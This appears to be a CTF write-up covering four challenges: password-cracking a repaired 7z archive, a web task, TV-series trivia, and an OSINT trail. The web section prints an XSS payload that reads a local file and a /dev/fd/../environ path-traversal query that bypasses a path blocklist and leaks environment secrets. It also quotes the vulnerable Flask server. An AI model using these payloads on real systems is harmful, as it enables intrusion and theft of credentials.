Forensic 300 - Hadi Hoppala ve de Cuppala

The link provided in the task was a corrupted file with no clue.

After a brief inspection on header, I understood that this was a 7z file but got corrupted.

Found the instructions for proper header and footer values on http://www.7-zip.org/recover.html and started to work on this on the last 20 minutes but couldn’t make it in time as I was having problem with CRC checksum.

Just FYI, I also spend some time after CTF officially ended. This 7z file was also password protected. To crack it I used brute-forcing with rockyou and found ‘piggies’ was the password.

Flag:

DKHOS_{4l_G1rd1n_g1rd1n}

Web 200 – Kımızım Kandan Bahtım Karadan

When we access to the ip provided, a web page with ‘Not Found’ text was welcoming us. After inspecting the website code we found the github repo of the blog theme.

From here, first thing to do was actually Diff’ing the repo with the code in the site. And we’ve found a file upload section. In here we also found an XSS vulnerability on Filename attribute and things were going really smooth!

With the code

<script>
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open("GET","file:///flag.txt");
x.send();
</script>

We were able to get the fl.. Unfortunately, it wasn’t that easy:).

Just under the page, we have seen the ‘DEV’ environment and thought this could be a virtual host. We prepared the query and get the response:

import os
from flask import Flask, request
app = Flask(__name__)
blist = (
'proc',
'www',
'var',
'etc',
'root',
'home',
'self',
'flag'
)
def get_flag():
    return os.environ.get('FLAG', '')
def super_firewall(path):
    for b in blist:
        if b in path:
            return False
    return True 
@app.route("/")
def hello():
    return "internal file storage, /file?name="
@app.route("/file")
def get_file():
    name = request.args.get('name', 'server.py')
    if not name:
        name = 'server.py'
    status = super_firewall(name)
    if not status:
        return "access denied"
    with open(name, 'r') as fp:
        content = fp.read()
        return content
if __name__ == '__main__':
    app.run(debug=False)

From here, it can be seen as FLAG was stored as an environment variable and we have to echo it somehow. In order to do it, we also need to bypass this mini filter blist.

After couple of trial and errors we prepared the query as:

/file?name=/dev/fd/../environ

and we got the flag:

LANG=en_US.UTF-8SUPERVISOR_SERVER_URL=unix:///var/run/supervisor.sockSUPERVISOR_ENABLED=1SUPERVISOR_PROCESS_NAME=internal
FLAG=DKHOS_{y0u_g0t_m3_pyth0n1st4}SUPERVISOR_GROUP_NAME=internalPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Trivia 400 – Kişi Faizi

Right after seeing this ‘intentional English translation fails’, I directly understood this was about TV Series ‘Person of Interest’ from the title.

In the description, a document about Frank Stephens’s death was mentioned and the flag was the date on it. After a brief search on the net, I found the Season 1 Episode 3 could be helpful but watching the whole episode didnt make any sense. Thus I found the episode conversation script and searched for the name.

After guessing the time according to these, the document with the flag was on that exact frame.

Cyber Intelligence 300 – Naber?

From the task description, it was clear that this was a social platform lookup.

On the instagram, I’ve found the user with an interesting share. If looked closer, it can be understood that it was a github account!

There was nothing suspicious on this repo as it was just a fork of another repo. Then in the commits I’ve found some nasty stuff.

From here, I found the pastebin account:

There was a strange text with a code in this pastebin. After trying telegram groups, we wanted to try whatsapp and found the flag as the name of the group!.